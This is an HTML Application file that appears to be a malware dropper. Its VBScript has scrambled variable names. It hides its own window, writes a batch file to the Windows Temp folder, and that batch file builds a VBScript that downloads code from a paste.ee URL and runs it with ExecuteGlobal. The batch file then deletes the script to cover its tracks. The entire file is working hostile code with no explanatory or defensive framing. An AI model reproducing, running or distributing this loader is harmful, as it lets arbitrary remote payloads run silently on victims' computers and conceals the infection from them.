<!DOCTYPE html>
<html>
<head>
<title>Executar Script</title>
<HTA:APPLICATION
APPLICATIONNAME="ScriptExecutor"
BORDER="none"
CAPTION="no"
SHOWINTASKBAR="no"
SINGLEINSTANCE="yes"
WINDOWSTATE="minimize"
/>
<script language="VBScript">
Dim midtour
Set midtour = CreateObject("WScript.Shell")
Dim charladies
charladies = "C:\Windows\Temp\smattered.bat"
Dim whisperously, deprecates
Set whisperously = CreateObject("Scripting.FileSystemObject")
Set deprecates = whisperously.CreateTextFile(charladies, True)
deprecates.WriteLine "@echo off"
deprecates.WriteLine "setlocal"
deprecates.WriteLine "set ""fugues=C:\Windows\Temp\chucklers.vbs"""
deprecates.WriteLine ">" & """%fugues%""" & " ("
deprecates.WriteLine " echo Dim noncatalog, documentarist"
deprecates.WriteLine " echo noncatalog = ""https://paste.ee/d/KISYRml6/0"""
deprecates.WriteLine " echo Set documentarist = CreateObject^(""MSXML2.XMLHTTP""^)"
deprecates.WriteLine " echo documentarist.open ""GET"", noncatalog, False"
deprecates.WriteLine " echo documentarist.send"
deprecates.WriteLine " echo If documentarist.Status = 200 Then"
deprecates.WriteLine " echo ExecuteGlobal documentarist.responseText"
deprecates.WriteLine " echo End If"
deprecates.WriteLine ")"
deprecates.WriteLine "start """" /b wscript //nologo ""%fugues%"""
deprecates.WriteLine "timeout /t 1 /nobreak >nul"
deprecates.WriteLine "del ""%fugues%"""
deprecates.WriteLine "endlocal"
deprecates.Close
midtour.Run "cmd.exe /c " & charladies, 0, False
window.close
</script>
</head>
<body>
</body>
</html>